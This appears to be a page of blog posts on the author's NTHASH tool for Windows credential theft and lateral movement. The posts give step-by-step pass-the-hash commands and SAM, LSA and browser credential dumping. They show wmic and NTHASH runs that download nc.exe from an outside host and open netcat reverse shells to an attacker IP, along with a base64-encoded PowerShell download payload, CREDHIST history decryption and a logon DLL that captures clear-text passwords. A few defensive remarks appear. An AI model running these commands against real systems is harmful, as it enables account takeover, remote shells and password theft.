Search results: nthash

Oct 29 2019
 

Last one in the "pass the hash" series.
Initially we used a remote RDP console.
We then demonstrated a netcat reverse shell.
What if we don't have RDP, or can't/don't want to use netcat against the remote target?

WinRM to the rescue !

1. Ensure WinRM is set up on the attacker host: winrm quickconfig

2. Add trusted hosts * (or restrict it to the target's IP) on the attacker host: powershell "Set-Item WSMan:\localhost\Client\TrustedHosts -Value '*' -Force"
(With NTLM the client has no way to verify the server's identity, which is why WinRM refuses hosts that are not trusted; a single IP is safer than *.)

3. Enable PS remoting on the remote target host (use wmic / see previous article, e.g. wmic /node:target process call create "powershell.exe Enable-PSRemoting -Force"): powershell.exe "Enable-PSRemoting -Force"

4. Enjoy a remote shell under PowerShell (from the attacker host): Enter-PSSession -ComputerName target

The session authenticates with the NTLM credentials of the "pth" shell you launch it from, so no -Credential is needed.

Oct 29 2019
 

In the previous article, we introduced the use of WMIC from a "pass the hash" shell.

Below is a list of useful wmic commands gathered from around the internet:

rem remember: impersonate is ok but delegate is not (WMI runs at the "impersonate" level; with NTLM there is no way to pass your credentials on to a third host)

rem become familiar with the available aliases
wmic alias list brief
rem see the available methods for any class
wmic [class] call /?

rem file stuff
wmic /node:target DATAFILE where "drive='c:' AND path='\\windows\\'" GET Name,readable,size
wmic /node:target datafile "c:\\temp\\test.txt" call rename c:\temp\abc.txt
wmic /node:target datafile "c:\\temp\\test.txt" call copy c:\temp\abc.txt

rem process stuff
wmic /node:target process call create "nc attacker-ip 9000 -e cmd.exe"
wmic /node:target process call create "cmd.exe /c echo test > c:\temp\test.txt"
wmic /node:target process where name="explorer.exe" call terminate
wmic /node:target process where processid="1234" call terminate
wmic /node:target process get name,processid

rem users and groups stuff
wmic /node:target useraccount list brief
wmic /node:target path Win32_GroupUser

Oct 29 2019
 

Let's again introduce a variant of the previous article.

Ideally we would use the Windows built-in wmic command rather than the nthash runwmi verb.

Unfortunately, wmic can be a pain with escaping characters in some situations, especially when combined with PowerShell.

The one below, for instance, won't work because of the ',' comma character (wmic uses the comma to separate method parameters).

wmic /node:target process call create "powershell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://erwan.labalec.fr/uploads/nc.exe','c:\temp\nc.exe')"

The trick/workaround is to base64-encode the PowerShell command as Unicode (UTF-16LE), which is the encoding powershell.exe -EncodedCommand expects.

NTHASH-win64.exe /base64encodew /input:(New-Object System.Net.WebClient).DownloadFile('http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe','c:\temp\nc.exe');

(%2f stands for '/', which NTHASH would otherwise take for the start of a command-line switch; the tool decodes it before encoding.)

Which gives you the following:

KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBlAHIAdwBhAG4ALgBsAGEAYgBhAGwAZQBjAC4AZgByAC8AdQBwAGwAbwBhAGQAcwAvAG4AYwAuAGUAeABlACcALAAnAGMAOgBcAHQAZQBtAHAAXABuAGMALgBlAHgAZQAnACkAOwA=

You can then execute a PowerShell command on a remote target using wmic like below:

wmic /node:target process call create "powershell.exe -encodedcommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBlAHIAdwBhAG4ALgBsAGEAYgBhAGwAZQBjAC4AZgByAC8AdQBwAGwAbwBhAGQAcwAvAG4AYwAuAGUAeABlACcALAAnAGMAOgBcAHQAZQBtAHAAXABuAGMALgBlAHgAZQAnACkAOwA="
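As an added example (not code from this page or from NTHASH), the same encoding done in Python, so the wmic line can be generated without ever exposing a comma, quote or parenthesis to wmic's parser; the decoder is the mirror operation a defender applies to an -EncodedCommand seen in a process-creation log. The one-liner and its base64 are copied from this post; the target name and the regex heuristic for spotting -e/-ec/-enc/-EncodedCommand are my own.

```python
import base64
import re
from typing import Optional

# The PowerShell one-liner from this post; the comma is what wmic chokes on.
PS_COMMAND = ("(New-Object System.Net.WebClient).DownloadFile("
              "'http://erwan.labalec.fr/uploads/nc.exe','c:\\temp\\nc.exe');")

# The base64 that NTHASH /base64encodew printed for it, copied from this post.
PAGE_B64 = ("KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBi"
            "AEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQA"
            "cAA6AC8ALwBlAHIAdwBhAG4ALgBsAGEAYgBhAGwAZQBjAC4AZgByAC8AdQBwAGwAbwBh"
            "AGQAcwAvAG4AYwAuAGUAeABlACcALAAnAGMAOgBcAHQAZQBtAHAAXABuAGMALgBlAHgA"
            "ZQAnACkAOwA=")


def encode_powershell(command: str) -> str:
    """powershell -EncodedCommand wants base64 of the UTF-16LE ('wide') text, which is
    what NTHASH /base64encodew produces; the ANSI /base64encode output would not run."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Mirror operation, for reading an -EncodedCommand found in a 4688 / Sysmon 1 event."""
    return base64.b64decode(encoded).decode("utf-16-le")


def wmic_create_encoded(target: str, command: str) -> str:
    """Build the wmic line. Only base64 characters reach wmic's parser, so commas,
    quotes and parentheses in the PowerShell code can no longer break it."""
    payload = encode_powershell(command)
    return f'wmic /node:{target} process call create "powershell.exe -EncodedCommand {payload}"'


# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# Heuristic of my own: a -e... switch followed by a long base64 run.
_ENC_SWITCH = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_from_cmdline(cmdline: str) -> Optional[str]:
    """Pull the encoded script out of a logged command line, or None if there is none."""
    m = _ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return decode_powershell(m.group(1))
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    line = wmic_create_encoded("target", PS_COMMAND)
    print(line)
    print("decoded back:", decode_from_cmdline(line))
```

The encoded form is also what shows up in the target's process-creation events, so the decoder is the first thing to run over any powershell.exe command line carrying a -e switch.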

Oct 29 2019
 

This time, let's introduce a variant of the previous article.

Rather than copying a file to the target through the remote admin$ share (which is not always available), let's have the target download the file over HTTP.

1. Set up a netcat listener on the attacker host
nc -L -vv -p 9000

2. Download a file from the internet onto the remote target

(remember, you are running this from a pth shell with the proper logon details).

NTHASH-win64.exe /runwmi /server:target /binary:powershell.exe -c (New-Object System.Net.WebClient).DownloadFile('http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe','c:\temp\nc.exe');

Notice the %2f in place of '/': we need to escape it, as otherwise NTHASH would read it as the start of a command-line switch.

(The download is plain HTTP, and c:\temp must already exist on the target or DownloadFile fails.)

3. Run netcat on the target host
NTHASH-win64.exe /runwmi /server:target /binary:c:\temp\nc.exe attacker_ip 9000 -e cmd.exe

At this point a shell pops up in your listening netcat.

Try a simple whoami for fun.

 

Oct 28 2019
 

In a previous article, we have seen how to perform lateral movement through "Pass The Hash".

Let's imagine there is no RDP server available on the target but you still need a shell on it.

Let's use a reverse shell, i.e. the target connects back to us (the attacker).

Also useful if the firewall on the target only allows outbound connections.

1. Set up a netcat listener on the attacker host
nc -L -vv -p 9000

2. Copy the file to the target host (remember, you are running this from a pth shell with the proper logon details).
copy nc.exe \\target\admin$

3. Run netcat on the target host
NTHASH-win64.exe /runwmi /server:target /binary:nc attacker_ip 9000 -e cmd.exe

(admin$ is the target's %SystemRoot%, which is on the PATH, so "nc" resolves without a full path.)

At this point a shell pops up in your listening netcat.

Try a simple whoami for fun.

Oct 28 2019
 

Following the previous article on NTHASH, let's see how to perform lateral movement using "pass the hash" (pth).

In 3 steps, let's retrieve some hashes and then perform a PTH (using the MS RDP client).

1. Retrieve the hash
NTHASH-win64.exe /dumpsam
or
NTHASH-win64.exe /dumphashes /system
or
reg save hklm\sam sam.sav and reg save hklm\system system.sav, then
NTHASH-win64.exe /dumphashes /offline
or (in a domain environment)
NTHASH-win64.exe /logonpasswords

2. Pass the hash
NTHASH-win64.exe /pth /user:username /password:8846F7EAEE8FB117AD06BDD830B7586C /domain:.

(8846F7EAEE8FB117AD06BDD830B7586C is the NT hash of "password".)

3. In the newly opened "pth" cmd shell, type mstsc /restrictedadmin /v:target

Restricted Admin mode has to be enabled on the target (DisableRestrictedAdmin set to 0 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa); without it the connection fails and the hash is of no use for RDP.

You will end up logged on as the "username" account in an RDP console on the server named "target".

Try a simple whoami for fun and go back to credential harvesting for this account using /firefox, /chrome, /enumvault, /enumcred, etc.

And you never had to enter the "username" password...

Note that any other client tool (preferably built into Windows) that inherits the NTLM credentials of the current logon session will work too (tasklist/taskkill, wmic, net, winrm/powershell, psexec, etc.).

This will be covered in future articles.

Oct 28 2019
 

Don't ask about the name: yes, it does not mean much, but this is all I've got so far...

A tribute to https://github.com/gentilkiwi/mimikatz
And, generally speaking, a tool to handle Windows passwords and perform lateral movement.
https://attack.mitre.org/matrices/enterprise/windows/ is definitely worth reading as well.

Source code on github here.

Command line so far:
NTHASH /setntlm [/server:hostname] /user:username /newhash:xxx
NTHASH /setntlm [/server:hostname] /user:username /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newhash:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newhash:xxx
NTHASH /gethash /password:password
NTHASH /getsid /user:username [/server:hostname]
NTHASH /getusers [/server:hostname]
NTHASH /getdomains [/server:hostname]
NTHASH /dumpsam
NTHASH /dumphashes [/offline]
NTHASH /dumphash /rid:123 [/offline]
NTHASH /getsamkey [/offline]
NTHASH /getsyskey [/offline]
NTHASH /getlsakeys
NTHASH /wdigest
NTHASH /logonpasswords
NTHASH /pth /user:username /password:myhash /domain:mydomain
NTHASH /enumcred
NTHASH /enumcred2
NTHASH /enumvault
NTHASH /chrome [/binary:path_to_database]
NTHASH /firefox [/binary:path_to_database]
NTHASH /cryptunprotectdata /binary:filename
NTHASH /cryptunprotectdata /input:string
NTHASH /cryptprotectdata /input:string
NTHASH /runasuser /user:username /password:password [/binary: x:\folder\bin.exe]
NTHASH /runastoken /pid:12345 [/binary: x:\folder\bin.exe]
NTHASH /runaschild /pid:12345 [/binary: x:\folder\bin.exe]
NTHASH /runas [/binary: x:\folder\bin.exe]
NTHASH /runts /user:session_id [/binary: x:\folder\bin.exe]
NTHASH /runwmi /binary:c:\folder\bin.exe [/server:hostname]
NTHASH /enumpriv
NTHASH /dumpprocess /pid:12345
NTHASH /bytetostring /input:hexabytes
NTHASH /stringtobyte /input:string
NTHASH /base64encodew /input:string
NTHASH /base64encode /input:string
NTHASH /base64decode /input:base64string
NTHASH /a_command /verbose
NTHASH /a_command /system

Jan 24 2021
 

Every time you change your logon password, Windows stores the hashes of the previous password in the CREDHIST file (located in %APPDATA%\Microsoft\Protect\CREDHIST).

Let's play with the CREDHIST file and NTHASH then.

Setup:
- User test created with Password1
- I then logged in and changed the password twice, to Password2 and then Password3.

***********************
I retrieved the CREDHIST file for that user, took it offline, then ran the below:
nthash-win64 /decodecredhist /binary:.\credhist-test

The file contains 2 entries (one per password change, i.e. twice).

*********************

Decryption is based on an HMAC key derived from the SHA1 of the password and the user SID.

Let's get the SHA1 of the current user password (the user SID is stored in the CREDHIST file).

NTHASH-win64.exe /widestringtohexa /input:Password3 | NTHASH-win64.exe /gethash /mode:SHA1
NTHASH 1.8 x64 by erwan2212@gmail.com
gethash
31F8F4DFCB16205363B35055EBE92A75F0A19CE3

**********************************
Now let's decrypt the last CREDHIST entry, i.e. #1.

nthash-win64 /decodecredhist /binary:.\credhist-test /password:31F8F4DFCB16205363B35055EBE92A75F0A19CE3 /key:1

I get
SHA1:2277C28035275149D01A8DE530CC13B74F59EDFB
NTLM:C39F2BEB3D2EC06A62CB887FB391DEE0

This is the SHA1/NTLM of Password2.
**********************************
Now let's decrypt the previous (and first) entry, i.e. #0, keyed this time with the SHA1 of Password2 we just recovered.

nthash-win64 /decodecredhist /binary:.\credhist-test /password:2277C28035275149D01A8DE530CC13B74F59EDFB /key:0

SHA1:CBA4E545B7EC918129725154B29F055E4CD5AEA8
NTLM:64F12CDDAA88057E06A81B54E73B949B

This is the SHA1/NTLM of Password1.

**********************************

That's it: we have seen the logic behind the CREDHIST file and how to decrypt it. Each entry is encrypted under the hash of the password that replaced it, so the current password (or just its SHA1) unlocks the whole history, one step at a time.
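As an added example, not NTHASH's code, here is the key-derivation step in Python: SHA1 over the UTF-16LE password (the value /gethash /mode:SHA1 printed above), then the DPAPI password-hash derivation, HMAC-SHA1 keyed with that SHA1 over the UTF-16LE SID including its terminating NUL (assumption: this is the derivation used by dpapick and mimikatz for CREDHIST and masterkeys, and the tool is expected to match it). The cipher step that turns the derived key and an entry into a SHA1/NTLM pair is left to the tool; the walk below only replays the chaining (newest entry first, each recovered SHA1 keying the next-older entry) against a constructed in-memory stand-in, which is not the on-disk CREDHIST layout. The SID is made up; the SHA1/NTLM pairs are the ones the tool printed above.

```python
import hashlib
import hmac

# Constructed SID (the real one is read from the CREDHIST file).
SAMPLE_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"

# (SHA1, NTLM) of the retired passwords as printed by /decodecredhist above, newest first.
PAGE_OUTPUT = [
    ("2277C28035275149D01A8DE530CC13B74F59EDFB", "C39F2BEB3D2EC06A62CB887FB391DEE0"),  # Password2
    ("CBA4E545B7EC918129725154B29F055E4CD5AEA8", "64F12CDDAA88057E06A81B54E73B949B"),  # Password1
]


def sha1_password(password: str) -> bytes:
    """SHA1 over the UTF-16LE password: what '/widestringtohexa | /gethash /mode:SHA1'
    prints and what /password: takes."""
    return hashlib.sha1(password.encode("utf-16-le")).digest()


def credhist_pwdhash(password_sha1: bytes, sid: str) -> bytes:
    """DPAPI password hash for a CREDHIST entry: HMAC-SHA1 keyed with SHA1(password)
    over the UTF-16LE SID including its NUL terminator (assumption: the
    dpapick/mimikatz derivation). Same SHA1 + different SID = different key."""
    return hmac.new(password_sha1, (sid + "\0").encode("utf-16-le"), hashlib.sha1).digest()


def walk_history(current_sha1: bytes, sid: str, entries, decrypt):
    """Replay the chain from this post. 'entries' are newest first; entry #n was
    encrypted under the password that replaced it, so the current SHA1 opens the
    newest entry and each recovered SHA1 opens the next-older one.
    'decrypt(entry, pwdhash) -> (sha1, ntlm)' is the tool's cipher step."""
    key_sha1, recovered = current_sha1, []
    for entry in entries:
        sha1, ntlm = decrypt(entry, credhist_pwdhash(key_sha1, sid))
        recovered.append((sha1, ntlm))
        key_sha1 = sha1
    return recovered


def make_demo(sid: str, current_password: str, page_output):
    """Constructed stand-in for the file (NOT the on-disk layout): each entry only
    opens with the right derived key and then yields the pair the tool printed."""
    entries, opener = [], sha1_password(current_password)
    for sha1_hex, ntlm_hex in page_output:
        entries.append({"key": credhist_pwdhash(opener, sid),
                        "sha1": bytes.fromhex(sha1_hex), "ntlm": bytes.fromhex(ntlm_hex)})
        opener = bytes.fromhex(sha1_hex)

    def decrypt(entry, pwdhash):
        if not hmac.compare_digest(entry["key"], pwdhash):
            raise ValueError("wrong key: chain broken")
        return entry["sha1"], entry["ntlm"]
    return entries, decrypt


if __name__ == "__main__":
    entries, decrypt = make_demo(SAMPLE_SID, "Password3", PAGE_OUTPUT)
    print("SHA1(Password3):", sha1_password("Password3").hex().upper())
    for i, (sha1, ntlm) in enumerate(walk_history(sha1_password("Password3"), SAMPLE_SID, entries, decrypt)):
        print(f"entry #{len(entries) - 1 - i}: SHA1:{sha1.hex().upper()} NTLM:{ntlm.hex().upper()}")
```

Because the key is bound to the SID, a CREDHIST file copied from another profile cannot be opened with a matching password alone; you need the SID it was written under, which is why the tool reads it from the file.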

Aug 16 2020
 

In previous articles, we have seen that hashed passwords are as good as clear-text passwords.

Still, sometimes it is nice to retrieve the passwords in clear text right away.
Under Windows, you can register a network provider which is called every time a user logs on.
And the beauty of it is that the credential manager passes the username and password to it in clear text.
Of course, you need to be a local admin to do so: we are not talking escalation here but pivoting/lateral movement.

You need to implement 2 functions in your DLL (NPGetCaps and NPLogonNotify), nicely documented by Microsoft here and here.

Once done, you can do pretty much what you want with the data.

I am providing an example here (source code and binary) which logs the username/password to a text file.
setup.cmd registers the DLL for you: no reboot needed, the next logon will be logged.

For the defender: the registration is visible in the ProviderOrder value under HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order and in the provider's own Services\<name>\NetworkProvider key; a new name showing up there is worth an alert.